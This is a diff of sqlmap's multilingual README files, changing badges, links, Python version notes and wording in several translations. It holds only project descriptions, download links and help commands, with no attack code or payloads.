* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
|
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
|
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,49 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
|
|
||||||
|
|
||||||
ეკრანის ანაბეჭდები
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
|
|
||||||
|
|
||||||
ინსტალაცია
|
|
||||||
----
|
|
||||||
|
|
||||||
თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით.
|
|
||||||
|
|
||||||
ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
|
|
||||||
|
|
||||||
გამოყენება
|
|
||||||
----
|
|
||||||
|
|
||||||
ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
|
||||||
|
|
||||||
ბმულები
|
|
||||||
----
|
|
||||||
|
|
||||||
* საწყისი გვერდი: https://sqlmap.org
|
|
||||||
* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,50 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다.
|
|
||||||
|
|
||||||
스크린샷
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
또는, wiki에 나와있는 몇몇 기능을 보여주는 [스크린샷 모음](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 을 방문하실 수 있습니다.
|
|
||||||
|
|
||||||
설치
|
|
||||||
----
|
|
||||||
|
|
||||||
[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 클릭하여 최신 버전의 tarball 파일, 또는 [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 클릭하여 최신 zipball 파일을 다운받으실 수 있습니다.
|
|
||||||
|
|
||||||
가장 선호되는 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmap을 다운로드 할 수 있습니다:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다.
|
|
||||||
|
|
||||||
사용법
|
|
||||||
----
|
|
||||||
|
|
||||||
기본 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
전체 옵션과 스위치 목록을 보려면 다음 명령어를 사용하세요:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
[여기](https://asciinema.org/a/46601)를 통해 사용 샘플들을 확인할 수 있습니다.
|
|
||||||
sqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록을 예제와 함께 보려면, [사용자 매뉴얼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)을 참고하시길 권장드립니다.
|
|
||||||
|
|
||||||
링크
|
|
||||||
----
|
|
||||||
|
|
||||||
* 홈페이지: https://sqlmap.org
|
|
||||||
* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* 트위터: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,50 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen.
|
|
||||||
|
|
||||||
Screenshots
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki.
|
|
||||||
|
|
||||||
Installatie
|
|
||||||
----
|
|
||||||
|
|
||||||
Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken.
|
|
||||||
|
|
||||||
Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**.
|
|
||||||
|
|
||||||
Gebruik
|
|
||||||
----
|
|
||||||
|
|
||||||
Om een lijst van basisopties en switches te krijgen gebruik:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
Om een lijst van alle opties en switches te krijgen gebruik:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden.
|
|
||||||
Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen.
|
|
||||||
|
|
||||||
Links
|
|
||||||
----
|
|
||||||
|
|
||||||
* Homepage: https://sqlmap.org
|
|
||||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,26 +1,26 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalających na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||||
|
|
||||||
Zrzuty ekranowe
|
Zrzuty ekranowe
|
||||||
----
|
----
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości.
|
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
|
||||||
|
|
||||||
Instalacja
|
Instalacja
|
||||||
----
|
----
|
||||||
|
|
||||||
Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
|
Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej.
|
do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6.x** lub **2.7.x** na dowolnej platformie systemowej.
|
||||||
|
|
||||||
Sposób użycia
|
Sposób użycia
|
||||||
----
|
----
|
||||||
@@ -33,18 +33,18 @@ Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
|
|||||||
|
|
||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
Przykładowy wynik działania dostępny jest [tutaj](https://asciinema.org/a/46601).
|
Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
|
||||||
Aby uzyskać listę wszystkich dostępnych funkcji, parametrów i opisów ich działania wraz z przykładami użycia sqlmap proponujemy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
Odnośniki
|
Odnośniki
|
||||||
----
|
----
|
||||||
|
|
||||||
* Strona projektu: https://sqlmap.org
|
* Strona projektu: http://sqlmap.org
|
||||||
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
|
* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||||
|
|
||||||
Imagens
|
Imagens
|
||||||
----
|
----
|
||||||
@@ -14,13 +14,14 @@ Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sql
|
|||||||
Instalação
|
Instalação
|
||||||
----
|
----
|
||||||
|
|
||||||
Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
Você pode baixar o arquivo tar mais recente clicando [aqui]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
|
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas.
|
sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
|
||||||
|
|
||||||
Como usar
|
Como usar
|
||||||
----
|
----
|
||||||
@@ -39,12 +40,12 @@ Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e
|
|||||||
Links
|
Links
|
||||||
----
|
----
|
||||||
|
|
||||||
* Homepage: https://sqlmap.org
|
* Homepage: http://sqlmap.org
|
||||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
|
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos)
|
* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,50 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza.
|
|
||||||
|
|
||||||
Slike
|
|
||||||
----
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama.
|
|
||||||
|
|
||||||
Instalacija
|
|
||||||
----
|
|
||||||
|
|
||||||
Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
|
||||||
|
|
||||||
Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.
|
|
||||||
|
|
||||||
Korišćenje
|
|
||||||
----
|
|
||||||
|
|
||||||
Kako biste dobili listu osnovnih opcija i prekidača koristite:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
Kako biste dobili listu svih opcija i prekidača koristite:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
Možete pronaći primer izvršavanja [ovde](https://asciinema.org/a/46601).
|
|
||||||
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidača, zajedno s primerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
|
||||||
|
|
||||||
Linkovi
|
|
||||||
----
|
|
||||||
|
|
||||||
* Početna stranica: https://sqlmap.org
|
|
||||||
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
|
sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
|
||||||
|
|
||||||
@@ -20,7 +20,7 @@ sqlmap - это инструмент для тестирования уязви
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе.
|
sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе.
|
||||||
|
|
||||||
Использование
|
Использование
|
||||||
----
|
----
|
||||||
@@ -39,12 +39,12 @@ sqlmap работает из коробки с [Python](https://www.python.org/d
|
|||||||
Ссылки
|
Ссылки
|
||||||
----
|
----
|
||||||
|
|
||||||
* Основной сайт: https://sqlmap.org
|
* Основной сайт: http://sqlmap.org
|
||||||
* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
|
* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
|
* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
